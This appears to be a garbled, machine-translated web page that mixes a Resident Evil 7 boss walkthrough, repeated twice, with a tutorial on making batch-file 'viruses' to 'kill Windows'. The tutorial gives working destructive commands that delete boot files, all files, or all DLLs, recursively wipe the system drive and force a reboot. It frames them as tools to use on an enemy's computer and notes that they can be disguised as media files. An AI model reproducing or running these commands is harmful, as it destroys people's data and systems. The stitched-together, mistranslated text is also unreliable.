How to kill wines 7 after rebooting. How to kill Windows? Quickly and forever. How to defeat Margarita in a greenhouse

A series from Capcom, like many other old franchises, is replete with various bosses. Almost everyone needs his approach, and not an exception.

Caution, spoilers! This article outlines the victory methods over all bosses in the game, and this knowledge may well spoil the impression of independent combat with them. It is recommended to resort to our help only if you do not at all in no way comes out to overcome difficulties.

Briefly about bosses Resident Evil 7

Before viewing each of the special opponents individually, it is worth a little talk about the overall concept of passing the game.

Resident Evil 7 can be divided into episodes, even in the game itself there are no clear boundaries between the stages. However, in each such conditional episode there is a final battle attached to a particular enemy.

In total, there are 6 special fights in the game, which stand out against the rest of its complexity. Next, they will all be disassembled in more detail. Once again, warn about spoilers!

How to defeat Miu in Resident Evil 7

The initial stage of the game takes place in the guest house, in the basement of which the main character finds his beloved - Miu Winters. However, after five to ten minutes, he pounces on it with a knife.

Having admired to grind Obsessed Mia, wait until she drops Itan to the wall. Then grab the lying on the right ax. Everything is quite simple: you need to block the blow of myi, and then immediately beat, and you can even without aiming.

After several blows on the head, the cat scene will again be launched, and the protagonist will bruise his Girl with an ax. She falls, but after a few moments it will disappear without a trace, and Itanu will only go to the attic to get out of the house.

Be sure to grab the gun and cartridges in one of the rooms, but do not waste them to break the boxes: there is nothing in them. Then start climbing the stairs, and then immediately let the rear, because you will start to get out of the Miya, armed with chainsaw.

The ax in this case will not help much, so it's best to use a gun. Try to shoot in the head, and after 7-8 hits, that will lose consciousness.

How to win the daddy jack in the garage

The head of the Baker family will be the second boss in Resident Evil 7, and it will be connected immediately three rather stressful battles with it, the first of which will be held in the garage. There the main character will go down to meet the sheriff's assistant.

Alas, but Jack will also decide to greet the guest, turning his head in the bloody messenger. After that, the battle begins.

Immediately grab the gun gun, he lies next to his body. You can then shoot a little in Jack to make sure that he is not a man at all. But do not pull: your task is to find the keys to the car. They lie near one of the walls.

Having got the cherished keys, carefully reply Jack somewhere away from the car, and then quickly run to it. Close to the cabin and enjoy the next cruel cat-scene.

Of course, Jack will revive again and go straight to you immediately after the cars will light up. Now the pistol is useful.

Discover and hold onto a safe distance from the opponent. After it fell, use the staircase to leave the garage.

How to win the daddy jack in the basement

The second battle with Jack Baker will be held in the basement, where the head of the family seized the corpses of those who could not turn to their side. The space here is quite strongly limited, so you need to act quickly, not cloging into the angle of fear (at first it will be difficult!).

Shoot the Jack from the gun or, if there are still cartridges, from a shotgun. If he approached too close, quickly run away into the opposite part of the "Arena" or, if possible, kick hanging bags with corpses.

After obtaining extensive poisoning with heavy metals, the daddy will suit the lighted corpse near the wall and will reach the threatening sekhech size. Immediately stop shooting: you will not need the cartridges, because now you can use the chainsaw near the same body at the wall.

After receiving a certain number of damage, Jack will squat on one knee, and the upper part of his body will begin to regenerate.

At these moments, it is necessary to attack it without any pause to apply as much damage as possible and do not give damaged parts of the body the opportunity to recover. After a while, the torso will burst and leave you with a nasty mucus, but you will not notice this: so much will win you over this gad!

How to defeat Margarita in a greenhouse

It seems that after Itan has already managed to divide with Jack twice, mommy should not make big problems. Partly the way it is, but only if you did not waste the cartridges and whenever possible, dangerous places.

Depending on the ammunition, the fight with Margarita will be either very easy or very difficult. One way or another, it will be divided into two phases.

First, Margarita will try to arrange for you traps, waiting in the holes upstairs. At this point, you may have a deceptive sense of security, because you can shoot it, keeping defense in one of the parts of the greenhouse.

In fact, this is a trap: after a while, Margarita will start to send a swarm of insects on you, to deal with which will not be so simple if you have little fuel in the burner.

Therefore, try to actually try to behave aggressively: if Margarita sat down in ambush, then shoot in the head to put her out, and at such moments, shoot a vile hive between her legs.

If you are quite assertive, then Margarita never take advantage of his little friends, and at a certain point it will turn out to be spoiled, and then mommy falls into fury and will chase you on all fours!

This is the second phase, and it is also quite complicated, because the boss will move faster and more often attack. You need to retool and make a taking shots in the head. When Margarita crashes too closely, shoot a shotgun - so you optimize the consumption of cartridges.

How to defeat the monster fat man in the barn

Of course, you probably waited for a battle with Lucas Baker, who by this moment is already terribly tired of her "jokes", but instead you will have to beat with a hefty fatty monster.

The boss is not very complicated, but can cause problems if you do not know tactics. After this black slippery carcass falls out of the improvised elevator, run to the stairs, there is a boss "meet" the most convenient.

Attack him when he begins to rise to you on the stairs. He can try to get you by burning blame, but in this case just move back, and then you will not be available for this attack.

When the fat man rose, deftly shock right in front of his nose and go down.

So you will again get tactical advantages, and nothing will remain fat, except let and follow you. Most likely, at this stage you finish it. If it comes out otherwise, just repeat the stairs and descend from it.

How to defeat Jack Baker at the pier

Did you miss the daddy? And he also missed you. Last time you were greatly injured, so much time was left for regeneration. Then now Jack Baker Well, just not know!

It became much more and stronger, and the Arena for the fight with him expanded and received an additional lower level.

The tactics of the battle with Monster Jack has also changed, and very reminds of the favorite Fun Capcom - "shooting through the pimples". To win, you need to shoot in the eyes, which are located in a variety of boss body parts.

Most of the eyes can be destroyed at the first level, just try to look at your feet to not fall. At the same time, you always follow the edge of the eye: when he begins to wade, immediately change the course and run away in the opposite direction, otherwise you have to spend the "first aid kits".

Some eyes are hidden in rather hard-to-reach places, and it is easier to reach them by shooting from the bottom up. Jump down and carefully follow the movements of the opponent. As soon as it appears to shoot in the eye, do it immediately.

When the monster does not have a spare eye, the cat-scene will begin, and then he will begin to twist the arena, and then reveals the last eye. It is necessary to shoot it, and then Ian Vsklet Jack one of two serum injections available at hand, and he will crumble into a lot of pieces. Jack is dead, now with the ends. Victory!

How to defeat Evelyna in Resident Evil 7

This is the last boss in the game, but despite this, to defeat it easier than the previous one. First you need to get to the girl. It will interfere with you, creating a hazardous sound waves. Block them as you block all the other attacks, and gradually pick up your goal.

When Itan turns out to be quite close, he grabbing Evelyna and feed her serum, and then the girl will show her true face. In fact, she has already come and accompanied the main character from the very beginning of the game in the image of the old grandmother.

But on this problems just begins, because Evelina is naturally "dubbanit" to immense sizes, and then you have to use the most killer weapons to defeat. I hope that you have a suitable for such a case, because to hide or dodge Evelina will be extremely difficult.

After you apply sufficient damage, the action goes to the courtyard, and there Evelina will discard itan on Earth. You will have to shoot out of the existing weapon, while the game will not allow you to move and hide the attack.

After a few moments, when you will definitely begin to recharge, a box with a gun falls next to you, and you will see from above, so that you take advantage of them. Do it!

Having made three shots from an extremely powerful pistol called in honor of the notorious Alberta Veszer, admire the death of Evelyn, and then exhale: Resident Evil 7 is passed.

How to kill Windows, or Batniki-malware on the enemy's computer.

ATTENTION! The following information is given only for informational purposes. Application and execution of these techniques may damage the Windows operating system. According to its actions, the created files execute a malicious code that destroys the most important files on the computer. Life-important files or all files are completely.

Hello everyone, this is another computer trick from a computer 76. The next trick is actually this, because it is the most real malware, which will be destroyed by the destruction of vital system files, after which the Windows operating system will cease to exist. So use it at your own peril and risk, and the more you should not run it on your computer: use the virtual machine. At the end of the article - a small for that video on this topic.

All commands described below - command scripts for console stored in the so-called file-batch file (extension file .bat.). Such files can be easily created using an ordinary notebook, forcing the system in the folder properties to show file extensions.:

The principle of creating such a file is simple:

  • creates a text file
  • we write the desired code
  • keep the document, but instead of expansion .txt We write .bat.

How to kill Windows. Option One: Kill Windows XP.

Actually, if you look carefully, it can be seen as This code will be able to kill exactly Windows XP, and why it is useless for later versions. But proceed ... As always, I first, we will create an empty notebook document and enter the following code in the field:

@echo off aTTRIB -R -S -H C: \\ autoexec.bat Del C: \\ AUTOEXEC.BAT ATTRIB -R -S -H C: \\ Boot.ini Del C: \\ Boot.ini Attrib -R -S -H C: \\ NTLDR Del C: \\ NTLDR aTTRIB -R -S -H C: \\ Windows \\ Win.ini del C: \\ Windows \\ Win.ini Shutdown -R -F -T 00

As you can see, the teams are sequentially erased. windows XP operating system system files required to load the system and start . So restore the system will be, to put it mildly, hard. A person must heal you strongly if you decide to use the "virus" against anyone or kill Windows. After starting the file, you will need to reboot so that the system is destroyed. The last reboot in her life.

How to kill Windows. Option Second: Kill wndows any version.

We have to create "viruses", which, in turn, delete either absolutely all files, or affect some of the directory. We are talking about files of both system and personal character (created, downloaded, etc.) in terms of its qualities much more serious than the previous option, for some information from the hard disk will have to restore with the help of special programs. It will take (depending on the volume of the hard drive) from 5 to 20 minutes, it all depends on the performance of the computer and the volume of the remote data.

To do this, create a notepad document and in an empty field that you will enter the following code. Yes, what code there is this line:

@echo off del *. *

This simple command removes everything Files C. any existing extension. Find out how both "virus" work on your computer or laptop, I do not recommend extremely. But the list of destroyed files can be dramatically reduced that it will not hurt to kill Windows forever, and the time victim will not remain on the meditation and the grief-user will not be able to do anything. Just will not have time. The command will work for versions of Windows 7 / 8.1 / 10. She, of course, cumbersome. And therefore this team has variations.

So, the list of destroyed files is enough to make vital for Windows files with extension .dll in folder System.. Then the Windows murder code will look at:

@echo off del * .dll

How to kill Windows, remove the disk?

No, you do not remove the whole. can. But you can "clean" its contents:

ECHO OFF DEL% SYSTEMDRIVE% \\ *. * / F / S / Q Shutdown -R -F -T 00

The main purpose of the Batnik is to call BSOD, which must be an imminent response to delete system files. However, you will most likely not see: the protected files will not give the protected files. But we do not need it. The process of "will put order" everywhere, where it is possible, so to spoil Windows will truly:

As you can see, a few lines of code, and the system ceases to exist. Unfortunately, everyone can get caught on this fishing rod. Especially if this happens on the background of the fact that an attacker is not difficult to hide a simple batch file in any file, disguising it in a video or audio roller, drawing, photo or even a text file. For example, for example, described in the article. Be carefull.

A series from Capcom, like many other old franchises, is replete with various bosses. Almost everyone needs his approach, and not an exception.

Caution, spoilers! This article outlines the victory methods over all bosses in the game, and this knowledge may well spoil the impression of independent combat with them. It is recommended to resort to our help only if you do not at all in no way comes out to overcome difficulties.

Briefly about bosses Resident Evil 7

Before viewing each of the special opponents individually, it is worth a little talk about the overall concept of passing the game.

Resident Evil 7 can be divided into episodes, even in the game itself there are no clear boundaries between the stages. However, in each such conditional episode there is a final battle attached to a particular enemy.

In total, there are 6 special fights in the game, which stand out against the rest of its complexity. Next, they will all be disassembled in more detail. Once again, warn about spoilers!

How to defeat Miu in Resident Evil 7

The initial stage of the game takes place in the guest house, in the basement of which the main character finds his beloved - Miu Winters. However, after five to ten minutes, he pounces on it with a knife.

Having admired to grind Obsessed Mia, wait until she drops Itan to the wall. Then grab the lying on the right ax. Everything is quite simple: you need to block the blow of myi, and then immediately beat, and you can even without aiming.

After several blows on the head, the cat scene will again be launched, and the protagonist will bruise his Girl with an ax. She falls, but after a few moments it will disappear without a trace, and Itanu will only go to the attic to get out of the house.

Be sure to grab the gun and cartridges in one of the rooms, but do not waste them to break the boxes: there is nothing in them. Then start climbing the stairs, and then immediately let the rear, because you will start to get out of the Miya, armed with chainsaw.

The ax in this case will not help much, so it's best to use a gun. Try to shoot in the head, and after 7-8 hits, that will lose consciousness.

How to win the daddy jack in the garage

The head of the Baker family will be the second boss in Resident Evil 7, and it will be connected immediately three rather stressful battles with it, the first of which will be held in the garage. There the main character will go down to meet the sheriff's assistant.

Alas, but Jack will also decide to greet the guest, turning his head in the bloody messenger. After that, the battle begins.

Immediately grab the gun gun, he lies next to his body. You can then shoot a little in Jack to make sure that he is not a man at all. But do not pull: your task is to find the keys to the car. They lie near one of the walls.

Having got the cherished keys, carefully reply Jack somewhere away from the car, and then quickly run to it. Close to the cabin and enjoy the next cruel cat-scene.

Of course, Jack will revive again and go straight to you immediately after the cars will light up. Now the pistol is useful.

Discover and hold onto a safe distance from the opponent. After it fell, use the staircase to leave the garage.

How to defeat the jack daddy in morgue

The second battle with Jack Baker will be held in the basement of the processing zone, where the head of the family seized the corpses of those who could not turn to their side. The space here is quite strongly limited, so you need to act quickly, not cloging into the angle of fear (at first it will be difficult!).

Shoot the Jack from the gun or, if there are still cartridges, from a shotgun. If he approached too close, quickly run away into the opposite part of the "Arena" or, if possible, kick hanging bags with corpses.

After obtaining extensive poisoning with heavy metals, the daddy will suit the lighted corpse near the wall and will reach the threatening sekhech size. Immediately stop shooting: you will not need the cartridges, because now you can use the chainsaw near the same body at the wall.

After receiving a certain number of damage, Jack will squat on one knee, and the upper part of his body will begin to regenerate.

At these moments, it is necessary to attack it without any pause to apply as much damage as possible and do not give damaged parts of the body the opportunity to recover. After a while, the torso will burst and leave you with a nasty mucus, but you will not notice this: so much will win you over this gad!

How to defeat Margarita in a greenhouse

It seems that after Itan has already managed to divide with Jack twice, mommy should not make big problems. Partly the way it is, but only if you did not waste the cartridges and whenever possible, dangerous places.

Depending on the ammunition, the fight with Margarita will be either very easy or very difficult. One way or another, it will be divided into two phases.

First, Margarita will try to arrange for you traps, waiting in the holes upstairs. At this point, you may have a deceptive sense of security, because you can shoot it, keeping defense in one of the parts of the greenhouse.

In fact, this is a trap: after a while, Margarita will start to send a swarm of insects on you, to deal with which will not be so simple if you have little fuel in the burner.

Therefore, try to actually try to behave aggressively: if Margarita sat down in ambush, then shoot in the head to put her out, and at such moments, shoot a vile hive between her legs.

If you are quite assertive, then Margarita never take advantage of his little friends, and at a certain point it will turn out to be spoiled, and then mommy falls into fury and will chase you on all fours!

This is the second phase, and it is also quite complicated, because the boss will move faster and more often attack. You need to retool and make a taking shots in the head. When Margarita crashes too closely, shoot a shotgun - so you optimize the consumption of cartridges.

How to defeat the monster fat man in the barn

Of course, you probably waited for a battle with Lucas Baker, who by this moment is already terribly tired of her "jokes", but instead you will have to beat with a hefty fatty monster.

The boss is not very complicated, but can cause problems if you do not know tactics. After this black slippery carcass falls out of the improvised elevator, run to the stairs, there is a boss "meet" the most convenient.

Attack him when he begins to rise to you on the stairs. He can try to get you by burning blame, but in this case just move back, and then you will not be available for this attack.

When the fat man rose, deftly shock right in front of his nose and go down.

So you will again get tactical advantages, and nothing will remain fat, except let and follow you. Most likely, at this stage you finish it. If it comes out otherwise, just repeat the stairs and descend from it.

How to defeat Jack Baker at the pier

Did you miss the daddy? And he also missed you. Last time you were greatly injured, so much time was left for regeneration. Then now Jack Baker Well, just not know!

It became much more and stronger, and the Arena for the fight with him expanded and received an additional lower level.

The tactics of the battle with Monster Jack has also changed, and very reminds of the favorite Fun Capcom - "shooting through the pimples". To win, you need to shoot in the eyes, which are located in a variety of boss body parts.

Most of the eyes can be destroyed at the first level, just try to look at your feet to not fall. At the same time, you always follow the edge of the eye: when he begins to wade, immediately change the course and run away in the opposite direction, otherwise you have to spend the "first aid kits".

Some eyes are hidden in rather hard-to-reach places, and it is easier to reach them by shooting from the bottom up. Jump down and carefully follow the movements of the opponent. As soon as it appears to shoot in the eye, do it immediately.

When the monster does not have a spare eye, the cat-scene will begin, and then he will begin to twist the arena, and then reveals the last eye. It is necessary to shoot it, and then Ian Vsklet Jack one of two serum injections available at hand, and he will crumble into a lot of pieces. Jack is dead, now with the ends. Victory!

How to defeat Evelyna in Resident Evil 7

This is the last boss in the game, but despite this, to defeat it easier than the previous one. First you need to get to the girl. It will interfere with you, creating a hazardous sound waves. Block them as you block all the other attacks, and gradually pick up your goal.

When Itan turns out to be quite close, he grabbing Evelyna and feed her serum, and then the girl will show her true face. In fact, she has already come and accompanied the main character from the very beginning of the game in the image of the old grandmother.

But on this problems just begins, because Evelina is naturally "dubbanit" to immense sizes, and then you have to use the most killer weapons to defeat. I hope that you have a suitable for such a case, because to hide or dodge Evelina will be extremely difficult.

After you apply sufficient damage, the action goes to the courtyard, and there Evelina will discard itan on Earth. You will have to shoot out of the existing weapon, while the game will not allow you to move and hide the attack.

After a few moments, when you will definitely begin to recharge, a box with a gun falls next to you, and you will see from above, so that you take advantage of them. Do it!

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